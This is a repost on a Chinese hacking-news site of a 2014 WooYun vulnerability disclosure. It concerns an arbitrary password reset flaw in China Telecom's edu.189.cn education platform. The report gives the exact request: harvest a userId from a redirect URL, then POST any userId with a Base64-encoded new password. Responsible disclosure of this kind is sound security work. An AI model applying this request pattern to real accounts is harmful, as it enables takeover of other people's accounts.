记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信数字教育资源公共服务平台任意密码重置之二(危及三千多万用户)

2014-11-12 20:20

WooYun: 中国电信数字教育资源公共服务平台任意密码重置(危及三千多万用户)

edu.189.cn 中国电信教育云 数字教育资源公共服务平台

应用产品有:教育云,人人通,班班通,翼校通,天翼翼校通,天翼家校通,家校互动平台,家校互动门户,家校沟通平台,家校微博

上述提交的漏洞是通过手机验证得出结论,刚刚想想可能邮箱找回也会有问题

于是...真有

漏洞证明:

a1.jpg



验证身份方式选择邮箱验证,点击发送邮箱之后会跳转到http://edu.189.cn/portal/passwordReset/toFinishSendEmail.do?userDto.userId=34188867

a2.jpg

从此处获取到一个关键的userDto.userId参数

---------------------------------------------------------------------------

然后就是任意密码修改了,构造如下POST:

code 区域
http://edu.189.cn/portal/passwordReset/resetPassword.do?_d=1411889822578

userDto.userId=34189287&userDto.password=MTIzNDU2

a3.jpg

userDto.userId可以从上面的发送邮箱后跳转的链接获取,userDto.password是新密码BASE64加密

就不修改他人帐号示例了,userDto.userId 34188867是我自己注册的帐号,对应用户名为wooyun2

审核可以自己构造修改密码登录测试。

修复方案:

其实发送到邮箱的找回密码的链接是类似

http://edu.189.cn/portal/passwordReset/validEmail.do?passKey=c1bXX329-7d48-4307-9269-4e2b1322603X

刚开始还以为是有验证,结果发现是我想多了..passKey这个根本无关紧要

开发无下限啊..

知识来源: www.wooyun.org/bugs/wooyun-2014-077651

阅读:80213 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信数字教育资源公共服务平台任意密码重置之二(危及三千多万用户)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云